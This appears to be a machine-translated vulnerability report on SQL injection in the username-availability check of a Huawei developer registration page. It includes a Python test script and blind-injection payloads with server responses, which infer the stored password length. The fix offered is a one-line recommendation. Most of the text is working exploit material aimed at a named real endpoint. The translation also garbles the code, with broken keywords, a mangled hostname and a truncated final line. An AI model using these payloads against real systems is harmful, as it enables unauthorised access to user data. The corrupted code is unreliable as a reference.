Huawei smart cloud's SQL injection and repair solutions

Author: Matrix
Brief description:
Huawei smart cloud has SQL injection and can theoretically modify background data
Detailed description:
Http://developer.huaweidevice.com/dev_creg.php

User name verification POST data is not strict, submit address/dev_creg/preg. php? Ckuser = 1

Refer to the following test script:
Import httplib, urllib

Import sys

 

If len (sys. argv) <2:

Exit (0)

 

Headers = {

"Accept ":"*/*",

"Accept-Language": "zh-CN, zh; q = 0.8 ",

"Referer": "http://developer.huaweidevice.com/dev_creg.php ",

"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) www.2cto.com Chrome/13.0.782.112 Safari/535.1 ",

"Content-Type": "application/x-www-form-urlencoded ",

"X-Requested-With": "XMLHttpRequest ",

}

Params = urllib. urlencode ({

"Username": sys. argv [1],

})

Conn = httplib. HTTPConnection ('developer .w.weidevice.com ')

Conn. request ("POST", "/dev_creg/preg. php? Ckuser = 1 ", params, headers)

 

Response = conn. getresponse ()

Data = response. read ()

Try:

Print data. decode ("UTF-8 ")

Failed t Exception:

Print dat
Proof of vulnerability:
Test. py ". '"
Returned error message: <B> SQL </B>: select uid from [Table] members where username = '. A' <br/>

D: \> test. py ". A' or '1' = '1"
{"Code": 0, "msg": "The nickname is invalid or already exists "}

When there is a simple filter in the background, spaces will be truncated.

D: \> test. py ". A' or (length (password) = 32) or '2' = '1"
{"Code": 0, "msg": "The nickname is invalid or already exists "}

D: \> test. py ". A' or (length (password) = 31) or '2' = '1"
{"Code": 1, "msg": "congratulations, this name can be registered! "}

D: \> test. py ". A' or (length (password) = 33) or '2' = '1"
{"Code": 1, "msg": "congratulations, this name can be registered! "}
Solution:
SQL filtering is recommended.